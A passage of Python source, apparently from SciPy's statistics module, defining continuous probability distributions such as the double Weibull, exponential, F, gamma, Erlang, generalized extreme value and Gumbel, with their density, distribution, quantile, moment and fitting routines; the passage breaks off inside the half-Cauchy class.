dgamma = dgamma_gen(name='dgamma')
class dweibull_gen(rv_continuous):
"""A double Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dweibull` is::
dweibull.pdf(x, c) = c / 2 * abs(x)**(c-1) * exp(-abs(x)**c)
%(example)s
"""
def _rvs(self, c):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
w = weibull_min.rvs(c, size=sz, random_state=rndm)
return w * (where(u >= 0.5, 1, -1))
def _pdf(self, x, c):
ax = abs(x)
Px = c / 2.0 * ax**(c-1.0) * exp(-ax**c)
return Px
def _logpdf(self, x, c):
ax = abs(x)
return log(c) - log(2.0) + special.xlogy(c - 1.0, ax) - ax**c
def _cdf(self, x, c):
Cx1 = 0.5 * exp(-abs(x)**c)
return where(x > 0, 1 - Cx1, Cx1)
def _ppf(self, q, c):
fac = 2. * where(q <= 0.5, q, 1. - q)
fac = np.power(-log(fac), 1.0 / c)
return where(q > 0.5, fac, -fac)
def _munp(self, n, c):
return (1 - (n % 2)) * special.gamma(1.0 + 1.0 * n / c)
# since we know that all odd moments are zeros, return them at once.
# returning Nones from _stats makes the public stats call _munp
# so overall we're saving one or two gamma function evaluations here.
def _stats(self, c):
return 0, None, 0, None
dweibull = dweibull_gen(name='dweibull')
## Exponential (gamma distributed with a=1.0, loc=loc and scale=scale)
class expon_gen(rv_continuous):
"""An exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `expon` is::
expon.pdf(x) = lambda * exp(- lambda*x)
for ``x >= 0``.
The scale parameter is equal to ``scale = 1.0 / lambda``.
`expon` does not have shape parameters.
%(example)s
"""
def _rvs(self):
return self._random_state.standard_exponential(self._size)
def _pdf(self, x):
return exp(-x)
def _logpdf(self, x):
return -x
def _cdf(self, x):
return -special.expm1(-x)
def _ppf(self, q):
return -special.log1p(-q)
def _sf(self, x):
return exp(-x)
def _logsf(self, x):
return -x
def _isf(self, q):
return -log(q)
def _stats(self):
return 1.0, 1.0, 2.0, 6.0
def _entropy(self):
return 1.0
expon = expon_gen(a=0.0, name='expon')
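# A short usage sketch (not part of the original module): the rate
# parameter lambda enters only through scale = 1/lambda.
# >>> from scipy import stats
# >>> stats.expon.cdf(1.0)               # 1 - exp(-1), ~0.63212
# >>> stats.expon(scale=0.5).cdf(1.0)    # lambda = 2: 1 - exp(-2), ~0.86466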
class exponweib_gen(rv_continuous):
"""An exponentiated Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponweib` is::
exponweib.pdf(x, a, c) =
a * c * (1-exp(-x**c))**(a-1) * exp(-x**c)*x**(c-1)
for ``x > 0``, ``a > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, a, c):
return exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
negxc = -x**c
exm1c = -special.expm1(negxc)
logp = (log(a) + log(c) + special.xlogy(a - 1.0, exm1c) +
negxc + special.xlogy(c - 1.0, x))
return logp
def _cdf(self, x, a, c):
exm1c = -special.expm1(-x**c)
return exm1c**a
def _ppf(self, q, a, c):
return (-special.log1p(-q**(1.0/a)))**asarray(1.0/c)
exponweib = exponweib_gen(a=0.0, name='exponweib')
class exponpow_gen(rv_continuous):
"""An exponential power continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponpow` is::
exponpow.pdf(x, b) = b * x**(b-1) * exp(1 + x**b - exp(x**b))
for ``x >= 0``, ``b > 0``. Note that this is a different distribution
from the exponential power distribution that is also known under the names
"generalized normal" or "generalized Gaussian".
References
----------
http://www.math.wm.edu/~leemis/chart/UDR/PDFs/Exponentialpower.pdf
%(example)s
"""
def _pdf(self, x, b):
return exp(self._logpdf(x, b))
def _logpdf(self, x, b):
xb = x**b
f = 1 + log(b) + special.xlogy(b - 1.0, x) + xb - exp(xb)
return f
def _cdf(self, x, b):
return -special.expm1(-special.expm1(x**b))
def _sf(self, x, b):
return exp(-special.expm1(x**b))
    def _isf(self, q, b):
        return (special.log1p(-log(q)))**(1./b)
def _ppf(self, q, b):
return pow(special.log1p(-special.log1p(-q)), 1.0/b)
exponpow = exponpow_gen(a=0.0, name='exponpow')
class fatiguelife_gen(rv_continuous):
"""A fatigue-life (Birnbaum-Saunders) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `fatiguelife` is::
fatiguelife.pdf(x, c) =
(x+1) / (2*c*sqrt(2*pi*x**3)) * exp(-(x-1)**2/(2*x*c**2))
for ``x > 0``.
References
----------
.. [1] "Birnbaum-Saunders distribution",
http://en.wikipedia.org/wiki/Birnbaum-Saunders_distribution
%(example)s
"""
def _rvs(self, c):
z = self._random_state.standard_normal(self._size)
x = 0.5*c*z
x2 = x*x
t = 1.0 + 2*x2 + 2*x*sqrt(1 + x2)
return t
def _pdf(self, x, c):
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return (log(x+1) - (x-1)**2 / (2.0*x*c**2) - log(2*c) -
0.5*(log(2*pi) + 3*log(x)))
def _cdf(self, x, c):
return special.ndtr(1.0 / c * (sqrt(x) - 1.0/sqrt(x)))
def _ppf(self, q, c):
tmp = c*special.ndtri(q)
return 0.25 * (tmp + sqrt(tmp**2 + 4))**2
def _stats(self, c):
# NB: the formula for kurtosis in wikipedia seems to have an error:
# it's 40, not 41. At least it disagrees with the one from Wolfram
        # Alpha. And the latter one, below, passes the tests, while the wiki
        # one doesn't. So far I haven't had the guts to actually check the
# coefficients from the expressions for the raw moments.
c2 = c*c
mu = c2 / 2.0 + 1.0
den = 5.0 * c2 + 4.0
mu2 = c2*den / 4.0
g1 = 4 * c * (11*c2 + 6.0) / np.power(den, 1.5)
g2 = 6 * c2 * (93*c2 + 40.0) / den**2.0
return mu, mu2, g1, g2
fatiguelife = fatiguelife_gen(a=0.0, name='fatiguelife')
class foldcauchy_gen(rv_continuous):
"""A folded Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldcauchy` is::
foldcauchy.pdf(x, c) = 1/(pi*(1+(x-c)**2)) + 1/(pi*(1+(x+c)**2))
for ``x >= 0``.
%(example)s
"""
def _rvs(self, c):
return abs(cauchy.rvs(loc=c, size=self._size,
random_state=self._random_state))
def _pdf(self, x, c):
return 1.0/pi*(1.0/(1+(x-c)**2) + 1.0/(1+(x+c)**2))
def _cdf(self, x, c):
return 1.0/pi*(arctan(x-c) + arctan(x+c))
def _stats(self, c):
return inf, inf, nan, nan
foldcauchy = foldcauchy_gen(a=0.0, name='foldcauchy')
class f_gen(rv_continuous):
"""An F continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `f` is::
df2**(df2/2) * df1**(df1/2) * x**(df1/2-1)
F.pdf(x, df1, df2) = --------------------------------------------
(df2+df1*x)**((df1+df2)/2) * B(df1/2, df2/2)
for ``x > 0``.
%(example)s
"""
def _rvs(self, dfn, dfd):
return self._random_state.f(dfn, dfd, self._size)
def _pdf(self, x, dfn, dfd):
return exp(self._logpdf(x, dfn, dfd))
def _logpdf(self, x, dfn, dfd):
n = 1.0 * dfn
m = 1.0 * dfd
lPx = m/2 * log(m) + n/2 * log(n) + (n/2 - 1) * log(x)
lPx -= ((n+m)/2) * log(m + n*x) + special.betaln(n/2, m/2)
return lPx
def _cdf(self, x, dfn, dfd):
return special.fdtr(dfn, dfd, x)
def _sf(self, x, dfn, dfd):
return special.fdtrc(dfn, dfd, x)
def _ppf(self, q, dfn, dfd):
return special.fdtri(dfn, dfd, q)
def _stats(self, dfn, dfd):
v1, v2 = 1. * dfn, 1. * dfd
v2_2, v2_4, v2_6, v2_8 = v2 - 2., v2 - 4., v2 - 6., v2 - 8.
mu = _lazywhere(
v2 > 2, (v2, v2_2),
lambda v2, v2_2: v2 / v2_2,
np.inf)
mu2 = _lazywhere(
v2 > 4, (v1, v2, v2_2, v2_4),
lambda v1, v2, v2_2, v2_4:
2 * v2 * v2 * (v1 + v2_2) / (v1 * v2_2**2 * v2_4),
np.inf)
g1 = _lazywhere(
v2 > 6, (v1, v2_2, v2_4, v2_6),
lambda v1, v2_2, v2_4, v2_6:
(2 * v1 + v2_2) / v2_6 * sqrt(v2_4 / (v1 * (v1 + v2_2))),
np.nan)
g1 *= np.sqrt(8.)
g2 = _lazywhere(
v2 > 8, (g1, v2_6, v2_8),
lambda g1, v2_6, v2_8: (8 + g1 * g1 * v2_6) / v2_8,
np.nan)
g2 *= 3. / 2.
return mu, mu2, g1, g2
f = f_gen(a=0.0, name='f')
## Folded Normal
## abs(Z) where (Z is normal with mu=L and std=S so that c=abs(L)/S)
##
## note: the Regress+ docs have the scale parameter correct, but the first
## parameter given there is a shape parameter A = c * scale
## Half-normal is folded normal with shape-parameter c=0.
class foldnorm_gen(rv_continuous):
"""A folded normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldnorm` is::
foldnormal.pdf(x, c) = sqrt(2/pi) * cosh(c*x) * exp(-(x**2+c**2)/2)
for ``c >= 0``.
%(example)s
"""
def _argcheck(self, c):
return (c >= 0)
def _rvs(self, c):
return abs(self._random_state.standard_normal(self._size) + c)
def _pdf(self, x, c):
return _norm_pdf(x + c) + _norm_pdf(x-c)
def _cdf(self, x, c):
return special.ndtr(x-c) + special.ndtr(x+c) - 1.0
def _stats(self, c):
# Regina C. Elandt, Technometrics 3, 551 (1961)
# http://www.jstor.org/stable/1266561
#
c2 = c*c
expfac = np.exp(-0.5*c2) / np.sqrt(2.*pi)
mu = 2.*expfac + c * special.erf(c/sqrt(2))
mu2 = c2 + 1 - mu*mu
g1 = 2. * (mu*mu*mu - c2*mu - expfac)
g1 /= np.power(mu2, 1.5)
g2 = c2 * (c2 + 6.) + 3 + 8.*expfac*mu
g2 += (2. * (c2 - 3.) - 3. * mu**2) * mu**2
g2 = g2 / mu2**2.0 - 3.
return mu, mu2, g1, g2
foldnorm = foldnorm_gen(a=0.0, name='foldnorm')
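# A short consistency sketch (not part of the original module): halfnorm
# is the c == 0 case of foldnorm, as noted in the comments above.
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.foldnorm.pdf(1.2, 0.0), stats.halfnorm.pdf(1.2))
# True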
## Extreme Value Type II or Frechet
## (defined in Regress+ documentation as Extreme LB) as
## a limiting value distribution.
##
class frechet_r_gen(rv_continuous):
"""A Frechet right (or Weibull minimum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_min : The same distribution as `frechet_r`.
frechet_l, weibull_max
Notes
-----
The probability density function for `frechet_r` is::
frechet_r.pdf(x, c) = c * x**(c-1) * exp(-x**c)
for ``x > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return c*pow(x, c-1)*exp(-pow(x, c))
def _logpdf(self, x, c):
return log(c) + (c-1)*log(x) - pow(x, c)
def _cdf(self, x, c):
return -special.expm1(-pow(x, c))
def _ppf(self, q, c):
return pow(-special.log1p(-q), 1.0/c)
def _munp(self, n, c):
return special.gamma(1.0+n*1.0/c)
def _entropy(self, c):
return -_EULER / c - log(c) + _EULER + 1
frechet_r = frechet_r_gen(a=0.0, name='frechet_r')
weibull_min = frechet_r_gen(a=0.0, name='weibull_min')
class frechet_l_gen(rv_continuous):
"""A Frechet left (or Weibull maximum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_max : The same distribution as `frechet_l`.
frechet_r, weibull_min
Notes
-----
The probability density function for `frechet_l` is::
frechet_l.pdf(x, c) = c * (-x)**(c-1) * exp(-(-x)**c)
for ``x < 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return c*pow(-x, c-1)*exp(-pow(-x, c))
def _cdf(self, x, c):
return exp(-pow(-x, c))
def _ppf(self, q, c):
return -pow(-log(q), 1.0/c)
def _munp(self, n, c):
val = special.gamma(1.0+n*1.0/c)
if (int(n) % 2):
sgn = -1
else:
sgn = 1
return sgn * val
def _entropy(self, c):
return -_EULER / c - log(c) + _EULER + 1
frechet_l = frechet_l_gen(b=0.0, name='frechet_l')
weibull_max = frechet_l_gen(b=0.0, name='weibull_max')
class genlogistic_gen(rv_continuous):
"""A generalized logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genlogistic` is::
genlogistic.pdf(x, c) = c * exp(-x) / (1 + exp(-x))**(c+1)
for ``x > 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return log(c) - x - (c+1.0)*special.log1p(exp(-x))
def _cdf(self, x, c):
Cx = (1+exp(-x))**(-c)
return Cx
def _ppf(self, q, c):
vals = -log(pow(q, -1.0/c)-1)
return vals
def _stats(self, c):
zeta = special.zeta
mu = _EULER + special.psi(c)
mu2 = pi*pi/6.0 + zeta(2, c)
g1 = -2*zeta(3, c) + 2*_ZETA3
g1 /= np.power(mu2, 1.5)
g2 = pi**4/15.0 + 6*zeta(4, c)
g2 /= mu2**2.0
return mu, mu2, g1, g2
genlogistic = genlogistic_gen(name='genlogistic')
class genpareto_gen(rv_continuous):
"""A generalized Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genpareto` is::
genpareto.pdf(x, c) = (1 + c * x)**(-1 - 1/c)
defined for ``x >= 0`` if ``c >=0``, and for
``0 <= x <= -1/c`` if ``c < 0``.
For ``c == 0``, `genpareto` reduces to the exponential
distribution, `expon`::
genpareto.pdf(x, c=0) = exp(-x)
For ``c == -1``, `genpareto` is uniform on ``[0, 1]``::
genpareto.cdf(x, c=-1) = x
%(example)s
"""
def _argcheck(self, c):
c = asarray(c)
self.b = _lazywhere(c < 0, (c,),
lambda c: -1. / c, np.inf)
return True
def _pdf(self, x, c):
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return _lazywhere((x == x) & (c != 0), (x, c),
lambda x, c: -special.xlog1py(c+1., c*x) / c,
-x)
def _cdf(self, x, c):
return -inv_boxcox1p(-x, -c)
def _sf(self, x, c):
return inv_boxcox(-x, -c)
def _ppf(self, q, c):
return -boxcox1p(-q, -c)
def _isf(self, q, c):
return -boxcox(q, -c)
def _munp(self, n, c):
def __munp(n, c):
val = 0.0
k = arange(0, n + 1)
for ki, cnk in zip(k, comb(n, k)):
val = val + cnk * (-1) ** ki / (1.0 - c * ki)
return where(c * n < 1, val * (-1.0 / c) ** n, inf)
return _lazywhere(c != 0, (c,),
lambda c: __munp(n, c),
gam(n + 1))
def _entropy(self, c):
return 1. + c
genpareto = genpareto_gen(a=0.0, name='genpareto')
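# A short consistency sketch (not part of the original module): as c -> 0
# genpareto approaches expon, which the boxcox-based _cdf above reproduces
# to within floating point for very small c.
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.genpareto.cdf(1.5, 1e-9), stats.expon.cdf(1.5))
# True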
class genexpon_gen(rv_continuous):
"""A generalized exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genexpon` is::
genexpon.pdf(x, a, b, c) = (a + b * (1 - exp(-c*x))) * \
exp(-a*x - b*x + b/c * (1-exp(-c*x)))
for ``x >= 0``, ``a, b, c > 0``.
References
----------
H.K. Ryu, "An Extension of Marshall and Olkin's Bivariate Exponential
Distribution", Journal of the American Statistical Association, 1993.
N. Balakrishnan, "The Exponential Distribution: Theory, Methods and
Applications", Asit P. Basu.
%(example)s
"""
def _pdf(self, x, a, b, c):
return (a + b*(-special.expm1(-c*x)))*exp((-a-b)*x +
b*(-special.expm1(-c*x))/c)
def _cdf(self, x, a, b, c):
return -special.expm1((-a-b)*x + b*(-special.expm1(-c*x))/c)
def _logpdf(self, x, a, b, c):
return np.log(a+b*(-special.expm1(-c*x))) + \
(-a-b)*x+b*(-special.expm1(-c*x))/c
genexpon = genexpon_gen(a=0.0, name='genexpon')
class genextreme_gen(rv_continuous):
"""A generalized extreme value continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r
Notes
-----
For ``c=0``, `genextreme` is equal to `gumbel_r`.
The probability density function for `genextreme` is::
genextreme.pdf(x, c) =
exp(-exp(-x))*exp(-x), for c==0
exp(-(1-c*x)**(1/c))*(1-c*x)**(1/c-1), for x <= 1/c, c > 0
Note that several sources and software packages use the opposite
convention for the sign of the shape parameter ``c``.
%(example)s
"""
def _argcheck(self, c):
min = np.minimum
max = np.maximum
self.b = where(c > 0, 1.0 / max(c, _XMIN), inf)
self.a = where(c < 0, 1.0 / min(c, -_XMIN), -inf)
return where(abs(c) == inf, 0, 1)
def _pdf(self, x, c):
cx = c*x
logex2 = where((c == 0)*(x == x), 0.0, special.log1p(-cx))
logpex2 = where((c == 0)*(x == x), -x, logex2/c)
pex2 = exp(logpex2)
# Handle special cases
logpdf = where((cx == 1) | (cx == -inf), -inf, -pex2+logpex2-logex2)
putmask(logpdf, (c == 1) & (x == 1), 0.0)
return exp(logpdf)
def _cdf(self, x, c):
loglogcdf = where((c == 0)*(x == x), -x, special.log1p(-c*x)/c)
return exp(-exp(loglogcdf))
def _ppf(self, q, c):
x = -log(-log(q))
return where((c == 0)*(x == x), x, -special.expm1(-c*x)/c)
def _stats(self, c):
g = lambda n: gam(n*c+1)
g1 = g(1)
g2 = g(2)
g3 = g(3)
g4 = g(4)
g2mg12 = where(abs(c) < 1e-7, (c*pi)**2.0/6.0, g2-g1**2.0)
gam2k = where(abs(c) < 1e-7, pi**2.0/6.0,
special.expm1(gamln(2.0*c+1.0)-2*gamln(c+1.0))/c**2.0)
eps = 1e-14
gamk = where(abs(c) < eps, -_EULER, special.expm1(gamln(c+1))/c)
m = where(c < -1.0, nan, -gamk)
v = where(c < -0.5, nan, g1**2.0*gam2k)
# skewness
sk1 = where(c < -1./3, nan,
np.sign(c)*(-g3+(g2+2*g2mg12)*g1)/((g2mg12)**(3./2.)))
sk = where(abs(c) <= eps**0.29, 12*sqrt(6)*_ZETA3/pi**3, sk1)
# kurtosis
ku1 = where(c < -1./4, nan,
(g4+(-4*g3+3*(g2+g2mg12)*g1)*g1)/((g2mg12)**2))
ku = where(abs(c) <= (eps)**0.23, 12.0/5.0, ku1-3.0)
return m, v, sk, ku
def _munp(self, n, c):
k = arange(0, n+1)
vals = 1.0/c**n * sum(
comb(n, k) * (-1)**k * special.gamma(c*k + 1),
axis=0)
return where(c*n > -1, vals, inf)
genextreme = genextreme_gen(name='genextreme')
def _digammainv(y):
# Inverse of the digamma function (real positive arguments only).
# This function is used in the `fit` method of `gamma_gen`.
# The function uses either optimize.fsolve or optimize.newton
# to solve `digamma(x) - y = 0`. There is probably room for
# improvement, but currently it works over a wide range of y:
# >>> y = 64*np.random.randn(1000000)
# >>> y.min(), y.max()
# (-311.43592651416662, 351.77388222276869)
    # >>> x = [_digammainv(t) for t in y]
    # >>> np.abs(special.digamma(x) - y).max()
# 1.1368683772161603e-13
#
_em = 0.5772156649015328606065120
func = lambda x: special.digamma(x) - y
if y > -0.125:
x0 = exp(y) + 0.5
if y < 10:
# Some experimentation shows that newton reliably converges
            # much faster than fsolve in this y range. For larger y,
# newton sometimes fails to converge.
value = optimize.newton(func, x0, tol=1e-10)
return value
elif y > -3:
x0 = exp(y/2.332) + 0.08661
else:
x0 = 1.0 / (-y - _em)
value, info, ier, mesg = optimize.fsolve(func, x0, xtol=1e-11,
full_output=True)
if ier != 1:
raise RuntimeError("_digammainv: fsolve failed, y = %r" % y)
return value[0]
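# A small round-trip sketch for _digammainv (not part of the original
# module; assumes the module's own namespace, where special is imported,
# and the tolerance below is an assumption rather than a tested bound):
# >>> x = _digammainv(1.5)
# >>> abs(special.digamma(x) - 1.5) < 1e-8
# True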
## Gamma (Use MATLAB and MATHEMATICA (b=theta=scale, a=alpha=shape) definition)
## gamma(a, loc, scale) with a an integer is the Erlang distribution
## gamma(1, loc, scale) is the Exponential distribution
## gamma(df/2, 0, 2) is the chi2 distribution with df degrees of freedom.
class gamma_gen(rv_continuous):
"""A gamma continuous random variable.
%(before_notes)s
See Also
--------
erlang, expon
Notes
-----
The probability density function for `gamma` is::
gamma.pdf(x, a) = lambda**a * x**(a-1) * exp(-lambda*x) / gamma(a)
for ``x >= 0``, ``a > 0``. Here ``gamma(a)`` refers to the gamma function.
The scale parameter is equal to ``scale = 1.0 / lambda``.
`gamma` has a shape parameter `a` which needs to be set explicitly. For
instance:
>>> from scipy.stats import gamma
>>> rv = gamma(3., loc = 0., scale = 2.)
    produces a frozen form of `gamma` with shape ``a = 3.``, ``loc = 0.``
and ``lambda = 1./scale = 1./2.``.
When ``a`` is an integer, `gamma` reduces to the Erlang
distribution, and when ``a=1`` to the exponential distribution.
%(example)s
"""
def _rvs(self, a):
return self._random_state.standard_gamma(a, self._size)
def _pdf(self, x, a):
return exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return special.xlogy(a-1.0, x) - x - gamln(a)
def _cdf(self, x, a):
return special.gammainc(a, x)
def _sf(self, x, a):
return special.gammaincc(a, x)
def _ppf(self, q, a):
return special.gammaincinv(a, q)
def _stats(self, a):
return a, a, 2.0/sqrt(a), 6.0/a
def _entropy(self, a):
return special.psi(a)*(1-a) + a + gamln(a)
def _fitstart(self, data):
        # The skewness of the gamma distribution is `2 / sqrt(a)`.
# We invert that to estimate the shape `a` using the skewness
# of the data. The formula is regularized with 1e-8 in the
# denominator to allow for degenerate data where the skewness
# is close to 0.
a = 4 / (1e-8 + _skew(data)**2)
return super(gamma_gen, self)._fitstart(data, args=(a,))
@inherit_docstring_from(rv_continuous)
def fit(self, data, *args, **kwds):
f0 = kwds.get('f0', None)
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is None:
# loc is not fixed. Use the default fit method.
return super(gamma_gen, self).fit(data, *args, **kwds)
# Special case: loc is fixed.
if f0 is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Fixed location is handled by shifting the data.
data = np.asarray(data)
if np.any(data <= floc):
raise FitDataError("gamma", lower=floc, upper=np.inf)
if floc != 0:
# Don't do the subtraction in-place, because `data` might be a
# view of the input array.
data = data - floc
xbar = data.mean()
# Three cases to handle:
# * shape and scale both free
# * shape fixed, scale free
# * shape free, scale fixed
if fscale is None:
# scale is free
if f0 is not None:
# shape is fixed
a = f0
else:
# shape and scale are both free.
# The MLE for the shape parameter `a` is the solution to:
                # log(a) - special.digamma(a) - log(xbar) + log(data).mean() = 0
s = log(xbar) - log(data).mean()
func = lambda a: log(a) - special.digamma(a) - s
aest = (3-s + np.sqrt((s-3)**2 + 24*s)) / (12*s)
xa = aest*(1-0.4)
xb = aest*(1+0.4)
a = optimize.brentq(func, xa, xb, disp=0)
# The MLE for the scale parameter is just the data mean
# divided by the shape parameter.
scale = xbar / a
else:
# scale is fixed, shape is free
# The MLE for the shape parameter `a` is the solution to:
# special.digamma(a) - log(data).mean() + log(fscale) = 0
c = log(data).mean() - log(fscale)
a = _digammainv(c)
scale = fscale
return a, floc, scale
gamma = gamma_gen(a=0.0, name='gamma')
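# A short usage sketch (not part of the original module): fixing floc=0
# takes the specialized Brent/digamma solver path in gamma_gen.fit above.
# >>> from scipy import stats
# >>> data = stats.gamma.rvs(2.5, scale=3.0, size=2000, random_state=0)
# >>> stats.gamma.fit(data, floc=0)   # (a_hat, 0.0, scale_hat)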
class erlang_gen(gamma_gen):
"""An Erlang continuous random variable.
%(before_notes)s
See Also
--------
gamma
Notes
-----
The Erlang distribution is a special case of the Gamma distribution, with
the shape parameter `a` an integer. Note that this restriction is not
enforced by `erlang`. It will, however, generate a warning the first time
a non-integer value is used for the shape parameter.
Refer to `gamma` for examples.
"""
def _argcheck(self, a):
allint = np.all(np.floor(a) == a)
allpos = np.all(a > 0)
if not allint:
# An Erlang distribution shouldn't really have a non-integer
# shape parameter, so warn the user.
warnings.warn(
'The shape parameter of the erlang distribution '
'has been given a non-integer value %r.' % (a,),
RuntimeWarning)
return allpos
def _fitstart(self, data):
# Override gamma_gen_fitstart so that an integer initial value is
# used. (Also regularize the division, to avoid issues when
# _skew(data) is 0 or close to 0.)
a = int(4.0 / (1e-8 + _skew(data)**2))
return super(gamma_gen, self)._fitstart(data, args=(a,))
# Trivial override of the fit method, so we can monkey-patch its
# docstring.
def fit(self, data, *args, **kwds):
return super(erlang_gen, self).fit(data, *args, **kwds)
if fit.__doc__ is not None:
fit.__doc__ = (rv_continuous.fit.__doc__ +
"""
Notes
-----
The Erlang distribution is generally defined to have integer values
for the shape parameter. This is not enforced by the `erlang` class.
When fitting the distribution, it will generally return a non-integer
value for the shape parameter. By using the keyword argument
`f0=<integer>`, the fit method can be constrained to fit the data to
a specific integer shape parameter.
""")
erlang = erlang_gen(a=0.0, name='erlang')
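# A short usage sketch (not part of the original module): constraining the
# shape with f0 keeps the Erlang fit on an integer shape parameter, as the
# fit docstring above suggests.
# >>> from scipy import stats
# >>> data = stats.erlang.rvs(3, scale=2.0, size=500, random_state=0)
# >>> stats.erlang.fit(data, f0=3, floc=0)   # (3, 0.0, scale_hat)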
class gengamma_gen(rv_continuous):
"""A generalized gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gengamma` is::
gengamma.pdf(x, a, c) = abs(c) * x**(c*a-1) * exp(-x**c) / gamma(a)
for ``x > 0``, ``a > 0``, and ``c != 0``.
%(example)s
"""
def _argcheck(self, a, c):
return (a > 0) & (c != 0)
def _pdf(self, x, a, c):
return exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
return log(abs(c)) + special.xlogy(c*a - 1, x) - x**c - gamln(a)
def _cdf(self, x, a, c):
val = special.gammainc(a, x**c)
cond = c + 0*val
return where(cond > 0, val, 1-val)
def _ppf(self, q, a, c):
val1 = special.gammaincinv(a, q)
val2 = special.gammaincinv(a, 1.0-q)
ic = 1.0/c
cond = c+0*val1
return where(cond > 0, val1**ic, val2**ic)
def _munp(self, n, a, c):
return special.gamma(a+n*1.0/c) / special.gamma(a)
def _entropy(self, a, c):
val = special.psi(a)
return a*(1-val) + 1.0/c*val + gamln(a)-log(abs(c))
gengamma = gengamma_gen(a=0.0, name='gengamma')
class genhalflogistic_gen(rv_continuous):
"""A generalized half-logistic continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `genhalflogistic` is::
genhalflogistic.pdf(x, c) = 2 * (1-c*x)**(1/c-1) / (1+(1-c*x)**(1/c))**2
for ``0 <= x <= 1/c``, and ``c > 0``.
%(example)s
"""
def _argcheck(self, c):
self.b = 1.0 / c
return (c > 0)
def _pdf(self, x, c):
limit = 1.0/c
tmp = asarray(1-c*x)
tmp0 = tmp**(limit-1)
tmp2 = tmp0*tmp
return 2*tmp0 / (1+tmp2)**2
def _cdf(self, x, c):
limit = 1.0/c
tmp = asarray(1-c*x)
tmp2 = tmp**(limit)
return (1.0-tmp2) / (1+tmp2)
def _ppf(self, q, c):
return 1.0/c*(1-((1.0-q)/(1.0+q))**c)
def _entropy(self, c):
return 2 - (2*c+1)*log(2)
genhalflogistic = genhalflogistic_gen(a=0.0, name='genhalflogistic')
class gompertz_gen(rv_continuous):
"""A Gompertz (or truncated Gumbel) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gompertz` is::
gompertz.pdf(x, c) = c * exp(x) * exp(-c*(exp(x)-1))
for ``x >= 0``, ``c > 0``.
%(example)s
"""
def _pdf(self, x, c):
return exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return log(c) + x - c * (exp(x) - 1.)
def _cdf(self, x, c):
return 1.0-exp(-c*(exp(x)-1))
def _ppf(self, q, c):
return log(1-1.0/c*log(1-q))
def _entropy(self, c):
return 1.0 - log(c) - exp(c)*special.expn(1, c)
gompertz = gompertz_gen(a=0.0, name='gompertz')
class gumbel_r_gen(rv_continuous):
"""A right-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_l, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_r` is::
gumbel_r.pdf(x) = exp(-(x + exp(-x)))
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(example)s
"""
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return -x - exp(-x)
def _cdf(self, x):
return exp(-exp(-x))
def _logcdf(self, x):
return -exp(-x)
def _ppf(self, q):
return -log(-log(q))
def _stats(self):
return _EULER, pi*pi/6.0, 12*sqrt(6)/pi**3 * _ZETA3, 12.0/5
def _entropy(self):
# http://en.wikipedia.org/wiki/Gumbel_distribution
return _EULER + 1.
gumbel_r = gumbel_r_gen(name='gumbel_r')
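# A short consistency sketch (not part of the original module): gumbel_r is
# the c == 0 member of the genextreme family, per the genextreme notes.
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.genextreme.cdf(0.7, 0.0), stats.gumbel_r.cdf(0.7))
# True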
class gumbel_l_gen(rv_continuous):
"""A left-skewed Gumbel continuous random variable.
%(before_notes)s
See Also
--------
gumbel_r, gompertz, genextreme
Notes
-----
The probability density function for `gumbel_l` is::
gumbel_l.pdf(x) = exp(x - exp(x))
The Gumbel distribution is sometimes referred to as a type I Fisher-Tippett
distribution. It is also related to the extreme value distribution,
log-Weibull and Gompertz distributions.
%(example)s
"""
def _pdf(self, x):
return exp(self._logpdf(x))
def _logpdf(self, x):
return x - exp(x)
def _cdf(self, x):
return 1.0-exp(-exp(x))
def _ppf(self, q):
return log(-log(1-q))
def _stats(self):
return -_EULER, pi*pi/6.0, \
-12*sqrt(6)/pi**3 * _ZETA3, 12.0/5
def _entropy(self):
return _EULER + 1.
gumbel_l = gumbel_l_gen(name='gumbel_l')
class halfcauchy_gen(rv_continuous):
"""A Half-Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfcauchy` is::
halfcauchy.pdf(x) = 2 / (pi * (1 + x**2))
for ``x >= 0``.
%(example)s
"""
def _pdf(self, x):
return 2.0/pi/(1.0+x*x)
def _logpdf(self, x):
